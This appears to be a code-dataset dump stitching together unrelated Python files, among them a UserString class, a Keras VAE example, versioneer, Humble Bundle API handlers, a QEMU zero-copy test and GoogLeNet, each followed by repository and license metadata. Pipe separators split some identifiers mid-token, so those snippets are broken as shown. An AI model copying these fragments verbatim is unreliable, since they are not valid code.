return self.__class__(self.data.expandtabs(tabsize))
def find(self, sub, start=0, end=sys.maxint):
return self.data.find(sub, start, end)
def index(self, sub, start=0, end=sys.maxint):
return self.data.index(sub, start, end)
|
def isalpha(self): return self.data.isalpha()
def isalnum(self): return self.data.isalnum()
def isdecimal(self): return self.data.isdecimal()
def isdigit(sel
|
f): return self.data.isdigit()
def islower(self): return self.data.islower()
def isnumeric(self): return self.data.isnumeric()
def isspace(self): return self.data.isspace()
def istitle(self): return self.data.istitle()
def isupper(self): return self.data.isupper()
def join(self, seq): return self.data.join(seq)
def ljust(self, width): return self.__class__(self.data.ljust(width))
def lower(self): return self.__class__(self.data.lower())
def lstrip(self): return self.__class__(self.data.lstrip())
def replace(self, old, new, maxsplit=-1):
return self.__class__(self.data.replace(old, new, maxsplit))
def rfind(self, sub, start=0, end=sys.maxint):
return self.data.rfind(sub, start, end)
def rindex(self, sub, start=0, end=sys.maxint):
return self.data.rindex(sub, start, end)
def rjust(self, width): return self.__class__(self.data.rjust(width))
def rstrip(self): return self.__class__(self.data.rstrip())
def split(self, sep=None, maxsplit=-1):
return self.data.split(sep, maxsplit)
def splitlines(self, keepends=0): return self.data.splitlines(keepends)
def startswith(self, prefix, start=0, end=sys.maxint):
return self.data.startswith(prefix, start, end)
def strip(self): return self.__class__(self.data.strip())
def swapcase(self): return self.__class__(self.data.swapcase())
def title(self): return self.__class__(self.data.title())
def translate(self, *args):
return self.__class__(self.data.translate(*args))
def upper(self): return self.__class__(self.data.upper())
class MutableString(UserString):
"""mutable string objects
Python strings are immutable objects. This has the advantage, that
strings may be used as dictionary keys. If this property isn't needed
and you insist on changing string values in place instead, you may cheat
and use MutableString.
But the purpose of this class is an educational one: to prevent
people from inventing their own mutable string class derived
from UserString and than forget thereby to remove (override) the
__hash__ method inherited from ^UserString. This would lead to
errors that would be very hard to track down.
A faster and better solution is to rewrite your program using lists."""
def __init__(self, string=""):
self.data = string
def __hash__(self):
raise TypeError, "unhashable type (it is mutable)"
def __setitem__(self, index, sub):
if index < 0 or index >= len(self.data): raise IndexError
self.data = self.data[:index] + sub + self.data[index+1:]
def __delitem__(self, index):
if index < 0 or index >= len(self.data): raise IndexError
self.data = self.data[:index] + self.data[index+1:]
def __setslice__(self, start, end, sub):
start = max(start, 0); end = max(end, 0)
if isinstance(sub, UserString):
self.data = self.data[:start]+sub.data+self.data[end:]
elif isinstance(sub, StringType) or isinstance(sub, UnicodeType):
self.data = self.data[:start]+sub+self.data[end:]
else:
self.data = self.data[:start]+str(sub)+self.data[end:]
def __delslice__(self, start, end):
start = max(start, 0); end = max(end, 0)
self.data = self.data[:start] + self.data[end:]
def immutable(self):
return UserString(self.data)
if __name__ == "__main__":
# execute the regression test to stdout, if called as a script:
import os
called_in_dir, called_as = os.path.split(sys.argv[0])
called_in_dir = os.path.abspath(called_in_dir)
called_as, py = os.path.splitext(called_as)
sys.path.append(os.path.join(called_in_dir, 'test'))
if '-q' in sys.argv:
import test_support
test_support.verbose = 0
__import__('test_' + called_as.lower())
|
derrickyoo/serve-tucson
|
serve_tucson/locations/models.py
|
Python
|
bsd-3-clause
| 956
| 0
|
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.db import models
class Location(models.Model):
address = models.CharField(blank=True)
latitude = models.DecimalField(max_digits=10, decimal_places=6)
longitude = models.DecimalField(max_digits=10, decimal_places=6)
created = models.DateTimeField(auto_add_now=True, editable=False)
updated = models.DateTimeField(auto_add=True, editable=False)
owner = models.ForeignKey(User)
def get_absolute_url(self):
return reverse('location-detail', args=[str(s
|
elf.id)])
def __str__(self):
return '{id: %d, latitude: %d, longitude: %d}' % (
self.id,
self.latitude,
self.longitude
)
class Meta:
app_label = 'location
|
s'
get_latest_by = 'updated'
ordering = ['updated']
verbose_name = 'location'
verbose_name_plural = 'Locations'
|
baojianzhou/DLReadingGroup
|
keras/examples/variational_autoencoder_deconv.py
|
Python
|
apache-2.0
| 7,159
| 0.000698
|
'''This script demonstrates how to build a variational autoencoder
with Keras and deconvolution layers.
Reference: "Auto-Encoding Variational Bayes" https://arxiv.org/abs/1312.6114
'''
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import norm
from keras.layers import Input, Dense, Lambda, Flatten, Reshape, Layer
from keras.layers import Conv2D, Conv2DTranspose
from keras.models import Model
from keras import backend as K
from keras import metrics
from keras.datasets import mnist
# input image dimensions
img_rows, img_cols, img_chns = 28, 28, 1
# number of convolutional filters to use
filters = 64
# convolution kernel size
num_conv = 3
batch_size = 100
if K.image_data_format() == 'channels_first':
original_img_size = (img_chns, img_rows, img_cols)
else:
original_img_size = (img_rows, img_cols, img_chns)
latent_dim = 2
intermediate_dim = 128
epsilon_std = 1.0
epochs = 5
x = Input(batch_shape=(batch_size,) + original_img_size)
conv_1 = Conv2D(img_chns,
kernel_size=(2, 2),
padding='same', activation='relu')(x)
conv_2 = Conv2D(filters,
kernel_size=(2, 2),
padding='same', activation='relu',
strides=(2, 2))(conv_1)
conv_3 = Conv2D(filters,
kernel_size=num_conv,
padding='same', activation='relu',
strides=1)(conv_2)
conv_4 = Conv2D(filters,
kernel_size=num_conv,
padding='same', activation='relu',
strides=1)(conv_3)
flat = Flatten()(conv_4)
hidden = Dense(intermediate_dim, activation='relu')(flat)
z_mean = Dense(latent_dim)(hidden)
z_log_var = Dense(latent_dim)(hidden)
def sampling(args):
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(batch_size, latent_dim),
mean=0., stddev=epsilon_std)
return z_mean + K.exp(z_log_var) * epsilon
# note that "output_shape" isn't necessary with the TensorFlow backend
# so you could write `Lambda(sampling)([z_mean, z_log_var])`
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
# we instantiate these layers separately so as to reuse them later
decoder_hid = Dense(intermediate_dim, activation='relu')
decoder_upsample = Dense(filters * 14 * 14, activation='relu')
if K.image_data_format() == 'channels_first':
output_shape = (batch_size, filters, 14, 14)
else:
output_shape = (batch_size, 14, 14, filters)
decoder_reshape = Reshape(output_shape[1:])
decoder_deconv_1 = Conv2DTranspose(filters,
kernel_size=num_conv,
padding='same',
strides=1,
activation='relu')
decoder_deconv_2 = Conv2DTranspose(filters, num_conv,
padding='same',
strides=1,
activation='relu')
if K.image_data_format() == 'channels_first':
output_shape = (batch_size, filters, 29, 29)
else:
output_shape = (batch_size, 29, 29, filters)
decoder_deconv_3_upsamp = Conv2DTranspose(filters,
kernel_size=(3, 3),
strides=(2, 2),
padding='valid',
activation='relu')
decoder_mean_squash = Conv2D(img_chns,
kernel_size=2,
padding='valid',
activation='sigmoid')
hid_decoded = decoder_hid(z)
up_decoded = decoder_upsample(hid_decoded)
reshape_decoded = decoder_reshape(up_decoded)
deconv_1_decoded = decoder_deconv_1(reshape_decoded)
deconv_2_decoded = decoder_deconv_2(deconv_1_decoded)
x_decoded_relu = decoder_deconv_3_upsamp(deconv_2_decoded)
x_decoded_mean_squash = decoder_mean_squash(x_decoded_relu)
# Custom loss layer
class CustomVariationalLayer(Layer):
def __init__(self, **kwargs):
self.is_placeholder = True
super(CustomVariationalLayer, self).__init__(**kwargs)
def vae_loss(self, x, x_decoded_mean_squash):
x = K.flatten(x)
x_decoded_mean_squash = K.flatten(x_decoded_mean_squash)
xent_loss = img_rows * img_cols * metrics.binary_crossentropy(x, x_decoded_mean_squash)
kl_loss = - 0.5 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)
return K.mean(xent_loss + kl_loss)
def call(self, inputs):
x = inputs[0]
x_decoded_mean_squash = inputs[1]
loss = self.vae_loss(x, x_decoded_mean_squash)
self.add_loss(loss, inputs=inputs)
# We don't use this output.
return x
y = CustomVariationalLayer()([x, x_decoded_mean_squash])
vae = Model(x, y)
|
vae.compil
|
e(optimizer='rmsprop', loss=None)
vae.summary()
# train the VAE on MNIST digits
(x_train, _), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_train = x_train.reshape((x_train.shape[0],) + original_img_size)
x_test = x_test.astype('float32') / 255.
x_test = x_test.reshape((x_test.shape[0],) + original_img_size)
print('x_train.shape:', x_train.shape)
vae.fit(x_train,
shuffle=True,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, x_test))
# build a model to project inputs on the latent space
encoder = Model(x, z_mean)
# display a 2D plot of the digit classes in the latent space
x_test_encoded = encoder.predict(x_test, batch_size=batch_size)
plt.figure(figsize=(6, 6))
plt.scatter(x_test_encoded[:, 0], x_test_encoded[:, 1], c=y_test)
plt.colorbar()
plt.show()
# build a digit generator that can sample from the learned distribution
decoder_input = Input(shape=(latent_dim,))
_hid_decoded = decoder_hid(decoder_input)
_up_decoded = decoder_upsample(_hid_decoded)
_reshape_decoded = decoder_reshape(_up_decoded)
_deconv_1_decoded = decoder_deconv_1(_reshape_decoded)
_deconv_2_decoded = decoder_deconv_2(_deconv_1_decoded)
_x_decoded_relu = decoder_deconv_3_upsamp(_deconv_2_decoded)
_x_decoded_mean_squash = decoder_mean_squash(_x_decoded_relu)
generator = Model(decoder_input, _x_decoded_mean_squash)
# display a 2D manifold of the digits
n = 15 # figure with 15x15 digits
digit_size = 28
figure = np.zeros((digit_size * n, digit_size * n))
# linearly spaced coordinates on the unit square were transformed through the inverse CDF (ppf) of the Gaussian
# to produce values of the latent variables z, since the prior of the latent space is Gaussian
grid_x = norm.ppf(np.linspace(0.05, 0.95, n))
grid_y = norm.ppf(np.linspace(0.05, 0.95, n))
for i, yi in enumerate(grid_x):
for j, xi in enumerate(grid_y):
z_sample = np.array([[xi, yi]])
z_sample = np.tile(z_sample, batch_size).reshape(batch_size, 2)
x_decoded = generator.predict(z_sample, batch_size=batch_size)
digit = x_decoded[0].reshape(digit_size, digit_size)
figure[i * digit_size: (i + 1) * digit_size,
j * digit_size: (j + 1) * digit_size] = digit
plt.figure(figsize=(10, 10))
plt.imshow(figure, cmap='Greys_r')
plt.show()
|
wheeler-microfluidics/dmf_control_board_plugin
|
_version.py
|
Python
|
bsd-3-clause
| 18,441
| 0
|
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# d
|
irectories (produced by setup.py build) will contain a much shorte
|
r file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.17 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = "v"
cfg.parentdir_prefix = "None"
cfg.versionfile_source = "_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty"
|
KnowNo/reviewboard
|
reviewboard/webapi/server_info.py
|
Python
|
mit
| 3,158
| 0
|
from __future__ import unicode_literals
import logging
from django.conf import settings
from reviewboard import get_version_string, get_package_version, is_release
from reviewboard.admin.server import get_server_url
_registered_capabilities = {}
_capabilities_defaults = {
'diffs': {
'base_commit_ids': True,
'moved_files': True,
'validation': {
'base_commit_ids': True,
}
},
'review_requests': {
'commit_ids': True,
},
'scmtools': {
'git': {
'empty_files': True,
},
'mercurial': {
'empty_files': True,
},
'perforce': {
'moved_files': True,
'empty_files': True,
},
'svn': {
'empty_files': True,
},
},
'text': {
'markdown': True,
'per_field_text_types': True,
'can_include_raw_values': True,
},
}
def get_server_info(request=None):
"""Returns server information for use in the API.
This is used for the root resource and for the deprecated server
info resource.
"""
capabilities = _capabilities_defaults.copy()
capabilities.update(_registered_capabilities)
return {
'product': {
'name': 'Review Board',
'version': get_version_string(),
'package_version': get_package_version(),
'is_release': is_release(),
},
'site': {
'url': get_server_url(request=request),
'administrators': [
{
'name': name,
'email': email,
}
for name, email in settings.ADMINS
],
'time_zone': settings.TIME_ZONE,
},
'capabilities': capabilities
}
def register_webapi_capabilities(capabilities_id, caps):
"""Registers a set of web API capabilities.
These capabilities will appear in the dictionary of available
capabilities with the ID as their key.
A capabilties_id attribute passed in, and can only be registerd once.
A KeyError will be thrown if attempting to register a second time.
"""
if not capabilities_id:
raise ValueError('The capabilities_id attribute must not be None')
if capabilities_id in _registered_capabilities:
raise KeyError('"%s" is already a registered set of capabilities'
% capabilities_id)
if capabilities_id in _capabilities_defaults:
raise KeyError('"%s" is reserved for the default set of capabilities'
% capabilities_id)
_registered_capabilities[capabilities_id] = caps
def unregister_webapi_capabilities(capabilities_id):
"""Unregisters a previously re
|
gistered set of web API capabilities."""
try:
del _registered_capabilities[capabilities_id]
except KeyError:
logging.error('Failed to unregister unknown web API capabilities '
'"%s".',
capabilities_id)
|
raise KeyError('"%s" is not a registered web API capabilities set'
% capabilities_id)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/scatter3d/error_z/_valueminus.py
|
Python
|
mit
| 512
| 0.001953
|
import _plotly_utils.basevalidators
class ValueminusValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="valueminus", parent_
|
name="scatter3d.error_z", **kwar
|
gs
):
super(ValueminusValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
min=kwargs.pop("min", 0),
role=kwargs.pop("role", "info"),
**kwargs
)
|
rmk135/objects
|
tests/unit/wiring/test_wiringfastapi_py36.py
|
Python
|
bsd-3-clause
| 1,426
| 0.004208
|
from httpx import AsyncClient
# Runtime import to avoid syntax errors in samples on Python < 3.5 and reach top-dir
import os
_TOP_DIR = os.path.abspath(
os.path.sep.join((
os.path.dirname(__file__),
'../',
)),
)
_SAMPLES_DIR = os.path.abspath(
os.path.sep.join((
os.path.dirname(__file__),
'../samples/',
)),
)
import sys
sys.path.append(_T
|
OP_DIR)
sys.path.append(_SAMPLES_DIR)
from asyncutils import AsyncTestCase
from wiringfastapi import web
class WiringFastAPITest(AsyncTestCase):
client: AsyncClient
def setUp(self) -> None:
super().setUp()
self.client = AsyncClient(app=web.app, base_url='http://test')
def tearDown(self) -> None:
self._run(self.client.aclose())
super
|
().tearDown()
def test_depends_marker_injection(self):
class ServiceMock:
async def process(self):
return 'Foo'
with web.container.service.override(ServiceMock()):
response = self._run(self.client.get('/'))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), {'result': 'Foo'})
def test_depends_injection(self):
response = self._run(self.client.get('/auth', auth=('john_smith', 'secret')))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), {'username': 'john_smith', 'password': 'secret'})
|
saltstack/salt
|
templates/test_state/tests/unit/states/test_{{module_name}}.py
|
Python
|
apache-2.0
| 590
| 0.015254
|
'''
:codeauthor: {{full_name}} <{{email}}>
'''
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase
from tests.support.mock import patch
import salt.states.{{module_name}} as {{module_name}}
|
class {{module_name|capital
|
ize}}TestCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
return {% raw -%} {
{% endraw -%} {{module_name}} {%- raw -%}: {
'__env__': 'base'
}
} {%- endraw %}
def test_behaviour(self):
# Test inherent behaviours
pass
|
ehabkost/tp-qemu
|
qemu/tests/zero_copy.py
|
Python
|
gpl-2.0
| 2,659
| 0
|
import logging
from autotest.client import utils
from autotest.client.shared import error
from virttest import env_process, utils_test
@error.context_aware
def run(test, params, env):
"""
Vhost zero copy test
1) Enable/Disable vhost_net zero copy in host
1) Boot the main vm.
3)
|
Run the ping test, check guest nic works.
4) check vm is alive have no crash
:param test: QEMU test object.
:param params: Dictionary with the test parameters.
:param env: Dictionary with test environment.
"""
def zerocp_enable_status():
"""
Check whether host have enabled zero copy, if enabled return True,
else return False.
"""
def_para_path = "/sys/module/vho
|
st_net/parameters/experimental_zcopytx"
para_path = params.get("zcp_set_path", def_para_path)
cmd_status = utils.system("grep 1 %s" % para_path, ignore_status=True)
if cmd_status:
return False
else:
return True
def enable_zerocopytx_in_host(enable=True):
"""
Enable or disable vhost_net zero copy in host
"""
cmd = "modprobe -rf vhost_net; "
if enable:
cmd += "modprobe vhost-net experimental_zcopytx=1"
else:
cmd += "modprobe vhost-net experimental_zcopytx=0"
if utils.system(cmd) or enable != zerocp_enable_status():
raise error.TestNAError("Set vhost_net zcopytx failed")
error.context("Set host vhost_net experimental_zcopytx", logging.info)
if params.get("enable_zerocp", 'yes') == 'yes':
enable_zerocopytx_in_host()
else:
enable_zerocopytx_in_host(False)
error.context("Boot vm with 'vhost=on'", logging.info)
params["vhost"] = "vhost=on"
params["start_vm"] = 'yes'
login_timeout = int(params.get("login_timeout", 360))
env_process.preprocess_vm(test, params, env, params.get("main_vm"))
vm = env.get_vm(params["main_vm"])
vm.verify_alive()
vm.wait_for_login(timeout=login_timeout)
guest_ip = vm.get_address()
error.context("Check guest nic is works by ping", logging.info)
status, output = utils_test.ping(guest_ip, count=10, timeout=20)
if status:
err_msg = "Run ping %s failed, after set zero copy" % guest_ip
raise error.TestError(err_msg)
elif utils_test.get_loss_ratio(output) == 100:
err_msg = "All packets lost during ping guest %s." % guest_ip
raise error.TestFail(err_msg)
# in vm.verify_alive will check whether have userspace or kernel crash
error.context("Check guest is alive and have no crash", logging.info)
vm.verify_alive()
|
JackDanger/sentry
|
src/sentry/digests/__init__.py
|
Python
|
bsd-3-clause
| 910
| 0
|
from __future__ import absolute_import
from collections import namedtuple
from django.conf import settings
from sentry.utils.dates import to_datetime
from sentry.utils.services import LazyServiceWrapper
from .backends.base import Backend # NOQA
from .backends.dummy import DummyBackend # NOQA
backend = LazyServiceWrapper(Backend, settings.SENTRY_DIGESTS,
|
settings.SENTRY_DIGESTS_OPTIONS,
(DummyBackend,))
backend.expose(locals())
class Record(namedtuple('Record', 'key value timestamp')):
@property
def datetime(self):
return to_datetime(self.timestamp)
ScheduleEntry = namedtuple('ScheduleEntry', 'key timestamp')
OPTIONS = frozenset((
'increment_delay',
'maximum_
|
delay',
'minimum_delay',
))
def get_option_key(plugin, option):
assert option in OPTIONS
return 'digests:{}:{}'.format(plugin, option)
|
lutris/humblebundle-python
|
humblebundle/handlers.py
|
Python
|
mit
| 5,985
| 0.000668
|
"""
Handlers to process the responses from the Humble Bundle API
"""
__author__ = "Joel Pedraza"
__copyright__ = "Copyright 2014, Joel Pedraza"
__license__ = "MIT"
from humblebundle import exceptions
from humblebundle import models
import itertools
import requests
# Helper methods
def parse_data(response):
try:
return response.json()
except ValueError as e:
raise exceptions.HumbleParseException("Invalid JSON: %s", str(e),
request=response.request,
response=response)
def get_errors(data):
errors = data.get('errors', None)
error_msg = ", ".join(itertools.chain.from_iterable(v for k, v in errors.items())) \
if errors else "Unspecified error"
return errors, error_msg
def authenticated_response_helper(response, data):
# Successful API calls might not have a success property.
# It's not enough to check if it's falsy, as None is acceptable
success = data.get('success', None)
if success is True:
return True
error_id = data.get('error_id', None)
errors, error_msg = get_errors(data)
# API calls that require login and have a missing or invalid token
if error_id == 'login_required':
raise exceptions.HumbleAuthenticationException(
error_msg, request=response.request, response=response
)
# Something happened, we're not sure what but we hope the error_msg is
# useful
if success is False or errors is not None or error_id is not None:
raise exceptions.HumbleResponseException(
error_msg, request=response.request, response=response
)
# Response had no success or errors fields, it's probably data
return True
# Response handlers
def login_handler(client, response):
""" login response always returns JSON """
data = parse_data(response)
success = data.get('success', None)
if success is True:
return True
captcha_required = data.get('captcha_required')
authy_required = data.get('authy_required')
errors, error_msg = get_errors(data)
if errors:
captcha = errors.get('captcha')
if captcha:
raise exceptions.HumbleCaptchaException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
username = errors.get('username')
if username:
raise exceptions.HumbleCredentialException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
authy_token = errors.get("authy-token")
if authy_token:
raise exceptions.HumbleTwoFactorException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
raise exceptions.HumbleAuthenticationException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
def gamekeys_handler(client, response):
""" get_gamekeys response always returns JSON """
data = parse_data(response)
if isinstance(data, list):
return [v['gamekey'] for v in data]
# Let the helper function raise any common exceptions
authenticated_
|
response_helper(response, data)
# We didn't get a list, or an error message
raise exceptions.HumbleResponseException(
"Unexpected response body", request=response.request, response=response
)
def order_list_handler(client, response):
""" order_list response always returns JSON """
data = parse_data(response)
if isinstance(data, list):
return [models.Order(client, order) for order in data]
# Let the helper function raise any common exceptions
|
authenticated_response_helper(response, data)
# We didn't get a list, or an error message
raise exceptions.HumbleResponseException(
"Unexpected response body", request=response.request, response=response
)
def order_handler(client, response):
""" order response might be 404 with no body if not found """
if response.status_code == requests.codes.not_found:
raise exceptions.HumbleResponseException(
"Order not found", request=response.request, response=response
)
data = parse_data(response)
# The helper function should be sufficient to catch any other errors
if authenticated_response_helper(response, data):
return models.Order(client, data)
def claimed_entities_handler(client, response):
"""
claimed_entities response always returns JSON
returns parsed json dict
"""
data = parse_data(response)
# The helper function should be sufficient to catch any errors
if authenticated_response_helper(response, data):
return data
def sign_download_url_handler(client, response):
""" sign_download_url response always returns JSON """
data = parse_data(response)
# If the request is unauthorized (this includes invalid machine names) this
# response has it's own error syntax
errors = data.get('_errors', None)
message = data.get('_message', None)
if errors:
error_msg = "%s: %s" % (errors, message)
raise exceptions.HumbleResponseException(
error_msg, request=response.request, response=response
)
# If the user isn't signed in we get a "typical" error response
if authenticated_response_helper(response, data):
return data['signed_url']
def store_products_handler(client, response):
""" Takes a results from the store as JSON and converts it to object """
data = parse_data(response)
return [models.StoreProduct(client, result) for result in data['results']]
|
nayyarv/MonteGMM
|
Inference/BayesInference.py
|
Python
|
mit
| 844
| 0.016588
|
__author__ = 'Varun Nayyar'
from Utils.MFCCArrayGen import emotions, speakers, getCorpus
from MCMC import MCMCRun
from emailAlerter import alertMe
def main2(numRuns = 100000, numMixtures = 8, speakerIndex = 6):
import time
for emotion in emotions:
start = t
|
ime.ctime()
Xpoints = getCorpus(emotion, speakers[speakerIndex])
message = MCMCRun(Xpoints, emotion+"-"+speakers[speakerInde
|
x], numRuns, numMixtures)
message += "Start time: {}\nEnd Time: {}\n".format(start, time.ctime())
message += "\nNumRuns: {}, numMixtures:{}\n ".format(numRuns, numMixtures)
message += "\nEmotion: {}, speaker:{}\n".format(emotion, speakers[speakerIndex])
alertMe(message)
if __name__ == "__main__":
for i in xrange(len(speakers)):
main2(numMixtures=8, speakerIndex=i)
|
incuna/django-user-deletion
|
user_deletion/__init__.py
|
Python
|
bsd-2-clause
| 61
| 0
|
default_a
|
pp_config = 'user_deletion.apps.
|
UserDeletionConfig'
|
2prime/DeepLab
|
ResNet/models/googlenet.py
|
Python
|
mit
| 3,237
| 0.001236
|
'''GoogLeNet with PyTorch.'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class Inception(nn.Module):
def __init__(self, in_planes, n1x1, n3x3red, n3x3, n5x5red, n5x5, pool_planes):
super(Inception, self).__init__()
# 1x1 conv branch
self.b1 = nn.Sequential(
nn.Conv2d(in_planes, n1x1, kernel_size=1),
nn.BatchNorm2d(n1x1),
nn.ReLU(True),
)
# 1x1 conv -> 3x3 conv branch
self.b2 = nn.Sequential(
nn.Conv2d(in_planes, n3x3red, kernel_size=1),
nn.BatchNorm2d(n3x3red),
nn.ReLU(True),
nn.Conv2d(n3x3red, n3x3, kernel_size=3, padding=1),
nn.BatchNorm2d(n3x3),
nn.ReLU(True),
)
# 1x1 conv -> 5x5 conv branch
self.b3 = nn.Sequential(
nn.Conv2d(in_planes, n5x5red, kernel_size=1),
nn.BatchNorm2d(n5x5red),
nn.ReLU(True),
nn.Conv2d(n5x5red, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
nn.Conv2d(n5x5, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
)
# 3x3 pool -> 1x1 conv branch
self.b4 = nn.Sequential(
nn.MaxPool2d(3, stride=1, padding=1),
nn.Conv2d(in_planes, pool_planes, kernel_size=1),
nn.BatchNorm2d(pool_planes),
nn.ReLU(True),
)
def forward(self, x):
y1 = self.b1(x)
y2 = self.b2(x)
y3 = self.b3(x)
y4 = self.b4(x)
return torch.cat([y1,y2,y3,y4], 1)
class GoogLeNet(nn.Module):
def __init__(self):
super(GoogLeNet, self).__init__()
self.pre_layers = nn.Sequential(
nn.Conv2d(3, 192, kernel_size=3, padding=1),
nn.BatchNorm2d(192),
nn.ReLU(True),
)
self.a3 = Inception(192, 64, 96, 128, 16, 32, 32)
self.b3 = Inception(256, 128, 128, 192, 32, 96, 64)
self.maxpool = nn.MaxPool2d(3, stride=2, padding=1)
self.a4 = Inception(480, 192, 96, 208, 16, 48, 64)
self.b4 = Inception(512, 160, 112, 224, 24, 64, 64)
